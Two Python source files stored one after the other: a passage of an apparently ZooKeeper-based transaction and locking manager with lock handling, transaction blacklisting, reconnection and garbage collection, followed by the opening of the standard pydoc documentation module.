logging.info('Trying again to see if we are in transaction {} '
'with retry #{}'.format(txid, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.is_in_transaction(app_id=app_id, txid=txid,
retries=retries - 1)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if we are in transaction {0}" \
.format(txid))
def is_orphan_lock(self, tx_lockpath):
""" Checks to see if a lock does not have a transaction linked.
If the groomer fails to unlock a lock for whatever reason, we need
to make sure the lock is eventually released.
Args:
tx_lockpath: A str, the path to the transaction using the lock.
Returns:
True if the lock is an orphan, and False otherwise.
"""
try:
self.handle.get(tx_lockpath)
return False
except kazoo.exceptions.NoNodeError:
return True
def acquire_additional_lock(self, app_id, txid, entity_key, create):
""" Acquire an additional lock for a cross group transaction.
Args:
app_id: A str representing the application ID.
txid: The transaction ID you are acquiring a lock for. Built into
the path.
entity_key: Used to get the root path.
create: A bool that indicates if we should create a new Zookeeper node
to store the lock information in.
Returns:
True on success, False if the lock cannot be acquired.
Raises:
ZKTransactionException: If we can't acquire the lock for the given
entity group, because a different transaction already has it.
"""
logging.debug("Acquiring additional lock for appid {0}, transaction id " \
"{1}, entity key {2}, with create {3}".format(app_id, txid, entity_key,
create))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
lockrootpath = self.get_lock_root_path(app_id, entity_key)
lockpath = None
try:
logging.debug("Trying to create path {0} with value {1}".format(
lockrootpath, txpath))
lockpath = self.run_with_retry(self.handle.create, lockrootpath,
value=str(txpath), acl=ZOO_ACL_OPEN, ephemeral=False,
sequence=False, makepath=True)
except kazoo.exceptions.NodeExistsError:
# fail to get lock
try:
tx_lockpath = self.run_with_retry(self.handle.get, lockrootpath)[0]
logging.error("Lock {0} in use by {1}".format(lockrootpath,
tx_lockpath))
if self.is_orphan_lock(tx_lockpath):
logging.error("Lock {0} is an orphan lock. Releasing it".format(
lockrootpath))
# Releasing the lock in question.
self.handle.delete(lockrootpath)
# Try to acquire the lock again.
return self.acquire_additional_lock(app_id, txid, entity_key, create)
except kazoo.exceptions.NoNodeError:
# If the lock is released by another thread this can get tossed.
# A race condition.
logging.warning("Lock {0} was in use but was released"\
.format(lockrootpath))
raise ZKTransactionException("acquire_additional_lock: There is " \
"already another transaction using {0} lock".format(lockrootpath))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get a lock at path {0}" \
.format(lockrootpath))
logging.debug("Created new lock root path {0} with value {1}".format(
lockrootpath, txpath))
transaction_lock_path = self.get_transaction_lock_list_path(app_id, txid)
try:
if create:
self.run_with_retry(self.handle.create_async, transaction_lock_path,
value=str(lockpath), acl=ZOO_ACL_OPEN, ephemeral=False,
makepath=False, sequence=False)
logging.debug("Created lock list path {0} with value {1}".format(
transaction_lock_path, lockpath))
else:
tx_lockpath = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = tx_lockpath.split(LOCK_LIST_SEPARATOR)
lock_list.append(lockpath)
lock_list_str = LOCK_LIST_SEPARATOR.join(lock_list)
self.run_with_retry(self.handle.set_async, transaction_lock_path,
str(lock_list_str))
logging.debug("Set lock list path {0} to value {1}".format(
transaction_lock_path, lock_list_str))
# We do this check last; otherwise we may leave locks behind due
# to a lack of a lock path reference.
if len(lock_list) > MAX_GROUPS_FOR_XG:
raise ZKBadRequest("acquire_additional_lock: Too many " \
"groups for this XG transaction.")
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't create or set a lock at path {0}" \
.format(transaction_lock_path))
return True
def is_xg(self, app_id, tx_id):
""" Checks to see if the transaction can operate over multiple entity
groups.
Args:
app_id: The application ID that the transaction operates over.
tx_id: The transaction ID that may or may not be XG.
Returns:
True if the transaction is XG, False otherwise.
Raises:
ZKTransactionException: on ZooKeeper exceptions.
ZKInternalException: If we can't tell if the transaction is a XG
transaction or not.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
return self.run_with_retry(self.handle.exists, self.get_xg_path(app_id,
tx_id))
except kazoo.exceptions.ZookeeperError as zk_exception:
raise ZKTransactionException("ZooKeeper exception:{0}"\
.format(zk_exception))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if transaction {0} was XG " \
"for app {1}".format(tx_id, app_id))
def acquire_lock(self, app_id, txid, entity_key):
""" Acquire lock for transaction. It will acquire additional locks
if the transactions is XG.
You must call get_transaction_id() first to obtain transaction ID.
You could call this method anytime if the root entity key is same,
or different in the case of it being XG.
Args:
app_id: The application ID to acquire a lock for.
txid: The transaction ID you are acquiring a lock for. Built into
the path.
entity_key: Used to get the root path.
Returns:
True on success, False otherwise.
Raises:
ZKTransactionException: If it could not get the lock.
"""
logging.debug("Acquiring lock for appid {0}, transaction id {1}, " \
"entity key {2}".format(app_id, txid, entity_key))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
lockrootpath = self.get_lock_root_path(app_id, entity_key)
try:
if self.is_in_transaction(app_id, txid): # use current lock
transaction_lock_path = self.get_transaction_lock_list_path(
app_id, txid)
prelockpath = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = prelockpath.split(LOCK_LIST_SEPARATOR)
logging.debug("Lock list: {0}".format(lock_list))
if lockrootpath in lock_list:
logging.debug("Already has lock: {0}".format(lockrootpath))
return True
else:
if self.is_xg(app_id, txid):
return self.acquire_additional_lock(app_id, txid, entity_key,
create=False)
else:
raise ZKBadRequest("acquire_lock: You can not lock " \
"different root entity in non-cross-group transaction.")
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("An internal exception prevented us from " \
"getting the lock for app id {0}, txid {1}, entity key {2}" \
.format(app_id, txid, entity_key))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get lock for app id {0}, txid " \
"{1}, entity key {2}".format(app_id, txid, entity_key))
return self.acquire_additional_lock(app_id, txid, entity_key, create=True)
def get_updated_key_list(self, app_id, txid):
""" Gets a list of keys updated in this transaction.
Args:
app_id: A str corresponding to the application ID whose transaction we
wish to query.
txid: The transaction ID that we want to get a list of updated keys for.
Returns:
A list of (keys, txn_id) that have been updated in this transaction.
Raises:
ZKTransactionException: If the given transaction ID does not correspond
to a transaction that is currently in progress.
"""
txpath = self.get_transaction_path(app_id, txid)
try:
child_list = self.run_with_retry(self.handle.get_children, txpath)
keylist = []
for item in child_list:
if re.match("^" + TX_UPDATEDKEY_PREFIX, item):
keyandtx = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, item]))[0]
key = urllib.unquote_plus(keyandtx.split(PATH_SEPARATOR)[0])
txn_id = urllib.unquote_plus(keyandtx.split(PATH_SEPARATOR)[1])
keylist.append((key, txn_id))
return keylist
except kazoo.exceptions.NoNodeError:
raise ZKTransactionException("get_updated_key_list: Transaction ID {0} " \
"is not valid.".format(txid))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get updated key list for appid " \
"{0}, txid {1}".format(app_id, txid))
def release_lock(self, app_id, txid):
""" Releases all locks acquired during this transaction.
Callers must call acquire_lock before calling release_lock. Upon calling
release_lock, the given transaction ID is no longer valid.
Args:
app_id: The application ID we are releasing a lock for.
txid: The transaction ID we are releasing a lock for.
Returns:
True if the locks were released.
Raises:
ZKTransactionException: If any locks acquired during this transaction
could not be released.
"""
logging.debug("Releasing locks for app {0}, with transaction id {1} " \
.format(app_id, txid))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
self.check_transaction(app_id, txid)
txpath = self.get_transaction_path(app_id, txid)
transaction_lock_path = self.get_transaction_lock_list_path(app_id, txid)
try:
lock_list_str = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = lock_list_str.split(LOCK_LIST_SEPARATOR)
for lock_path in lock_list:
logging.debug("Lock released: {0}".format(lock_path))
self.run_with_retry(self.handle.delete, lock_path)
self.run_with_retry(self.handle.delete, transaction_lock_path)
except kazoo.exceptions.NoNodeError:
try:
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException(
"Unable to release lock {0} for app id {1}" \
.format(transaction_lock_path, app_id))
else:
return True
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("Internal exception prevented us from " \
"releasing lock {0} for app id {1}".format(transaction_lock_path,
app_id))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't release lock {0} for appid {1}" \
.format(transaction_lock_path, app_id))
try:
if self.is_xg(app_id, txid):
xg_path = self.get_xg_path(app_id, txid)
self.run_with_retry(self.handle.delete, xg_path)
for child in self.run_with_retry(self.handle.get_children, txpath):
logging.debug("Removing lock: {0}".format(PATH_SEPARATOR.join(
[txpath, child])))
self.run_with_retry(self.handle.delete, PATH_SEPARATOR.join(
[txpath, child]))
# This deletes the transaction root path.
self.run_with_retry(self.handle.delete, txpath)
except ZKInternalException as zk_exception:
# Although there was a failure doing the async deletes, since we've
# already released the locks above, we can safely return True here.
logging.exception(zk_exception)
self.reestablish_connection()
return True
except kazoo.exceptions.KazooException as kazoo_exception:
# Although there was a failure doing the async deletes, since we've
# already released the locks above, we can safely return True here.
logging.exception(kazoo_exception)
self.reestablish_connection()
return True
return True
def is_blacklisted(self, app_id, txid, retries=5):
""" Checks to see if the given transaction ID has been blacklisted (that is,
if it is no longer considered to be a valid transaction).
Args:
app_id: The application ID whose transaction ID we want to validate.
txid: The transaction ID that we want to validate.
Returns:
True if the transaction is blacklisted, False otherwise.
Raises:
ZKInternalException: If we couldn't determine if the transaction was
blacklisted or not.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
blacklist_root = self.get_blacklist_root_path(app_id)
blacklist_txn = PATH_SEPARATOR.join([blacklist_root,
str(txid)])
return self.run_with_retry(self.handle.exists, blacklist_txn)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
logging.info('Trying again to see if transaction {} is blacklisted '
'with retry #{}'.format(txid, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.is_blacklisted(app_id=app_id, txid=txid,
retries=retries - 1)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if appid {0}'s transaction, " \
"{1}, is blacklisted.".format(app_id, txid))
def get_valid_transaction_id(self, app_id, target_txid, entity_key):
""" This returns valid transaction id for the entity key.
Args:
app_id: A str representing the application ID.
target_txid: The transaction id that we want to check for validness.
entity_key: The entity that the transaction operates over.
Returns:
A long containing the latest valid transaction id, or zero if there is
none.
Raises:
ZKInternalException: If we couldn't get a valid transaction ID.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
# If this is an ongoing transaction give the previous value.
try:
if self.is_in_transaction(app_id, target_txid):
key_list = self.get_updated_key_list(app_id, target_txid)
for (key, txn_id) in key_list:
if entity_key == key:
return long(txn_id)
except ZKTransactionException as zk_exception:
# If the transaction is blacklisted.
# Get the valid id.
vtxpath = self.get_valid_transaction_path(app_id, entity_key)
try:
return long(self.run_with_retry(self.handle.get, vtxpath)[0])
except kazoo.exceptions.NoNodeError:
# Blacklisted and without a valid ID.
return long(0)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't get valid transaction id for " \
"app {0}, target txid {1}, entity key {2}".format(app_id, target_txid,
entity_key))
# The given target ID is not blacklisted or in an ongoing transaction.
return target_txid
def register_updated_key(self, app_id, current_txid, target_txid, entity_key):
""" Registers a key which is a part of a transaction. This is to know
what journal version we must rollback to upon failure.
Args:
app_id: A str representing the application ID.
current_txid: The current transaction ID for which we'll rollback to upon
failure.
target_txid: A long transaction ID we are rolling forward to.
entity_key: A str key we are registering.
Returns:
True on success.
Raises:
ZKTransactionException: If the transaction is not valid.
ZKInternalException: If we were unable to register the key.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
vtxpath = self.get_valid_transaction_path(app_id, entity_key)
try:
if self.run_with_retry(self.handle.exists, vtxpath):
# Update the transaction ID for entity if there is valid transaction.
self.run_with_retry(self.handle.set_async, vtxpath, str(target_txid))
else:
# Store the updated key info into the current transaction node.
value = PATH_SEPARATOR.join([urllib.quote_plus(entity_key),
str(target_txid)])
txpath = self.get_transaction_path(app_id, current_txid)
if self.run_with_retry(self.handle.exists, txpath):
self.handle.create_async(PATH_SEPARATOR.join([txpath,
TX_UPDATEDKEY_PREFIX]), value=str(value), acl=ZOO_ACL_OPEN,
ephemeral=False, sequence=True, makepath=False)
else:
raise ZKTransactionException("Transaction {0} is not valid.".format(
current_txid))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't register updated key for app " \
"{0}, current txid {1}, target txid {2}, entity_key {3}".format(app_id,
current_txid, target_txid, entity_key))
return True
def notify_failed_transaction(self, app_id, txid):
""" Marks the given transaction as failed, invalidating its use by future
callers.
This function also cleans up successful transactions that have expired.
Args:
app_id: The application ID whose transaction we wish to invalidate.
txid: An int representing the transaction ID we wish to invalidate.
Returns:
True if the transaction was invalidated, False otherwise.
"""
logging.debug("Notify failed transaction app: {0}, txid: {1}"\
.format(app_id, str(txid)))
lockpath = None
lock_list = []
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
try:
lockpath = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, TX_LOCK_PATH]))[0]
lock_list = lockpath.split(LOCK_LIST_SEPARATOR)
except kazoo.exceptions.NoNodeError:
# There is no need to rollback because there is no lock.
logging.debug("There is no lock for transaction {0}.".format(txid))
pass
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
try:
if lock_list:
# Add the transaction ID to the blacklist.
now = str(time.time())
blacklist_root = self.get_blacklist_root_path(app_id)
if not self.run_with_retry(self.handle.exists, blacklist_root):
self.handle.create(blacklist_root, value=DEFAULT_VAL,
acl=ZOO_ACL_OPEN, ephemeral=False, sequence=False, makepath=True)
self.handle.create_async(PATH_SEPARATOR.join([blacklist_root,
str(txid)]), value=now, acl=ZOO_ACL_OPEN)
children = []
try:
children = self.run_with_retry(self.handle.get_children, txpath)
except kazoo.exceptions.NoNodeError:
pass
# Copy valid transaction ID for each updated key into valid list.
for child in children:
if re.match("^" + TX_UPDATEDKEY_PREFIX, child):
value = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, child]))[0]
valuelist = value.split(PATH_SEPARATOR)
key = urllib.unquote_plus(valuelist[0])
vid = valuelist[1]
vtxroot = self.get_valid_transaction_root_path(app_id)
if not self.run_with_retry(self.handle.exists, vtxroot):
self.run_with_retry(self.handle.create, vtxroot, DEFAULT_VAL,
ZOO_ACL_OPEN, False, False, True)
vtxpath = self.get_valid_transaction_path(app_id, key)
self.run_with_retry(self.handle.create_async, vtxpath, str(vid),
ZOO_ACL_OPEN)
# Release the locks.
for lock in lock_list:
try:
self.run_with_retry(self.handle.delete, lock)
except kazoo.exceptions.NoNodeError:
# Try to delete all nodes, so skip any failure to release a lock.
pass
if self.is_xg(app_id, txid):
try:
self.run_with_retry(self.handle.delete, self.get_xg_path(app_id,
txid))
except kazoo.exceptions.NoNodeError:
logging.error("No node error when trying to remove {0}".format(txid))
# Remove the transaction paths.
for item in self.run_with_retry(self.handle.get_children, txpath):
try:
self.run_with_retry(self.handle.delete,
PATH_SEPARATOR.join([txpath, item]))
except kazoo.exceptions.NoNodeError:
logging.error("No node error when trying to remove {0}".format(txid))
logging.debug("Notify failed transaction removing lock: {0}".\
format(txpath))
self.run_with_retry(self.handle.delete, txpath)
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
return False
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
return True
def reestablish_connection(self):
""" Checks the connection and resets it as needed. """
logging.warning("Re-establishing ZooKeeper connection.")
try:
self.handle.restart()
self.needs_connection = False
self.failure_count = 0
logging.info("Restarted ZK connection successfully.")
return
except kazoo.exceptions.ZookeeperError as close_exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(exception)
try:
self.handle.stop()
except kazoo.exceptions.ZookeeperError as close_exception:
logging.error("Issue stopping ZK connection.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.error("Issue stopping ZK connection.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.error("Issue stopping ZK connection.")
logging.exception(exception)
try:
self.handle.close()
except kazoo.exceptions.ZookeeperError as close_exception:
logging.error("Issue closing ZK connection.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.error("Issue closing ZK connection.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.error("Issue closing ZK connection.")
logging.exception(exception)
logging.warning("Creating a new connection to ZK")
reconnect_error = False
self.handle = kazoo.client.KazooClient(hosts=self.host,
max_retries=self.DEFAULT_NUM_RETRIES, timeout=self.DEFAULT_ZK_TIMEOUT)
try:
self.handle.start()
except kazoo.exceptions.KazooException as kazoo_exception:
reconnect_error = True
logging.exception(kazoo_exception)
except Exception as exception:
reconnect_error = True
logging.exception(exception)
if reconnect_error:
logging.error("Error re-establishing ZooKeeper connection!")
self.needs_connection = True
self.failure_count += 1
else:
logging.info("Successfully created a new connection")
self.needs_connection = False
self.failure_count = 0
if self.failure_count > self.MAX_CONNECTION_FAILURES:
logging.critical("Too many connection errors to ZooKeeper. Aborting")
sys.exit(1)
def gc_runner(self):
""" Transaction ID garbage collection (GC) runner.
Note: This must run as a separate thread.
"""
logging.debug("Starting GC thread.")
while self.gc_running:
# Scan each application's last GC time.
try:
app_list = self.run_with_retry(self.handle.get_children, APPS_PATH)
for app in app_list:
app_id = urllib.unquote_plus(app)
# App is already encoded, so we should not use
# self.get_app_root_path.
app_path = PATH_SEPARATOR.join([APPS_PATH, app])
self.try_garbage_collection(app_id, app_path)
except kazoo.exceptions.NoNodeError:
# There were no nodes for this application.
pass
except kazoo.exceptions.OperationTimeoutError as ote:
logging.warning("GC operation timed out while trying to get {0}"\
" with {1}".format(APPS_PATH, str(ote)))
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
with self.gc_cv:
self.gc_cv.wait(GC_INTERVAL)
logging.debug("Stopping GC thread.")
def try_garbage_collection(self, app_id, app_path):
""" Try to garbage collect timed out transactions.
Args:
app_id: The application ID.
app_path: The application path for which we're garbage collecting.
Returns:
True if the garbage collector ran, False otherwise.
"""
last_time = 0
try:
val = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([app_path, GC_TIME_PATH]))[0]
last_time = float(val)
except kazoo.exceptions.NoNodeError:
last_time = 0
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
# If the last GC time plus our GC interval is earlier than the current time,
# it's time to run the GC again.
if last_time + GC_INTERVAL < time.time():
gc_path = PATH_SEPARATOR.join([app_path, GC_LOCK_PATH])
try:
now = str(time.time())
# Get the global GC lock.
self.run_with_retry(self.handle.create, gc_path, value=now,
acl=ZOO_ACL_OPEN, ephemeral=True)
try:
self.execute_garbage_collection(app_id, app_path)
# Update the last time when the GC was successful.
now = str(time.time())
self.update_node(PATH_SEPARATOR.join([app_path, GC_TIME_PATH]), now)
except Exception as exception:
logging.exception(exception)
# Release the lock.
self.run_with_retry(self.handle.delete, gc_path)
except kazoo.exceptions.NodeExistsError:
# Failed to obtain the GC lock. Try again later.
pass
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
return False
def get_lock_with_path(self, path):
""" Tries to get the lock based on path.
Args:
path: A str, the lock path.
Returns:
True if the lock was obtained, False otherwise.
"""
try:
now = str(time.time())
self.run_with_retry(self.handle.create, path, value=now,
acl=ZOO_ACL_OPEN, ephemeral=True)
except kazoo.exceptions.NoNodeError:
logging.error("Couldn't create path {0}".format(path))
return False
except kazoo.exceptions.NodeExistsError:
return False
except kazoo.exceptions.SystemZookeeperError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except SystemError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
def release_lock_with_path(self, path):
""" Releases lock based on path.
Args:
path: A str, the lock path.
Returns:
True on success, False on system failures.
Raises:
ZKTransactionException: If the lock could not be released.
"""
try:
self.run_with_retry(self.handle.delete, path)
except kazoo.exceptions.NoNodeError:
raise ZKTransactionException("Unable to delete lock: {0}".format(path))
except kazoo.exceptions.SystemZookeeperError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except SystemError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
def execute_garbage_collection(self, app_id, app_path):
""" Execute garbage collection for an application.
Args:
app_id: The application ID.
app_path: The application path.
"""
start = time.time()
# Get the transaction ID list.
txrootpath = PATH_SEPARATOR.join([app_path, APP_TX_PATH])
try:
txlist = self.run_with_retry(self.handle.get_children, txrootpath)
except kazoo.exceptions.NoNodeError:
# there is no transaction yet.
return
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
return
# Verify the time stamp of each transaction.
for txid in txlist:
if not re.match("^" + APP_TX_PREFIX + '\d', txid):
logging.debug("Skipping {0} because it is not a transaction.".format(
txid))
continue
txpath = PATH_SEPARATOR.join([txrootpath, txid])
try:
txtime = float(self.run_with_retry(self.handle.get, txpath)[0])
# If the transaction's start time plus the timeout is earlier than the
# current time, the transaction has timed out and should be failed.
if txtime + TX_TIMEOUT < time.time():
self.notify_failed_transaction(app_id, long(txid.lstrip(
APP_TX_PREFIX)))
except kazoo.exceptions.NoNodeError:
# Transaction id disappeared during garbage collection.
# The transaction may have finished successfully.
pass
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
return
logging.debug("Lock GC took {0} seconds.".format(str(time.time() - start)))
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
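# For example (illustrative): cram('abcdefghij', 7) keeps roughly half of the
# length budget on each side of the ellipsis and returns 'ab...ij'.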
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
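# For example (illustrative): stripid('<function spam at 0x00b3c1a8>')
# returns '<function spam>'.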
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo', '$py.class'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (0, None))
if lastupdate < mtime:
